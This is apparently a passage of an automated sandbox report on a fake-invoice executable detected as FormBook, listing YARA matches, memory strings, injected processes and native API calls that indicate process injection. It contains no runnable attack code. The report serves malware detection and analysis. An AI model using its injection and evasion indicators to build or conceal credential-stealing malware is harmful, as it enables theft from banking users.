          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000008.00000002.475299853.0000000003E62000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lande
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041826C NtReadFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B198F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B195D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B197A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B198A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B199D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A10 NtQuerySection,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B195F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19560 NtWriteFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B196D0 NtCreateKey,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1A770 NtOpenThread,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19760 NtOpenProcess,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041826C NtReadFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004182EA NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C8270 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C82F0 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C826C NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C82EA NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C81BA NtCreateFile,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_00406945
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040711C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00408C5B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00408C60
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041C538
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00402D89
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041C7A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA20A8
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEB090
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91002
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADF900
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA22AE
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0EBB0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9DBD2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA2B28
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE841F
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AED5E0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA25DD
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD0D20
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA2D07
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA1D55
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA2EF7
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF6E30
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA1FF1
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_00408C5B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_00408C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380DBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03812B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038122AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038120A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038128EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03801002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0381E824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0381DFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03811FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03766E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03812EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380D616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03740D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038125DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03812D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03811D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380D466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CC7A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030B2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CC538
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030B2D89
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030B2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030B8C5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030B8C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0374B150 appears 35 times
          Source: C:\Users\user\Desktop\INV74321.exeCode function: String function: 00ADB150 appears 35 times
          Source: C:\Users\user\Desktop\INV74321.exeCode function: String function: 0041A0A0 appears 38 times
          Source: INV74321.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: INV74321.exe, 00000000.00000003.208336740.0000000002C7F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV74321.exe
          Source: INV74321.exe, 00000000.00000002.221214353.0000000000A70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INV74321.exe
          Source: INV74321.exe, 00000001.00000002.257734527.0000000000D5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV74321.exe
          Source: INV74321.exe, 00000001.00000002.257457719.0000000000A62000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs INV74321.exe
          Source: INV74321.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
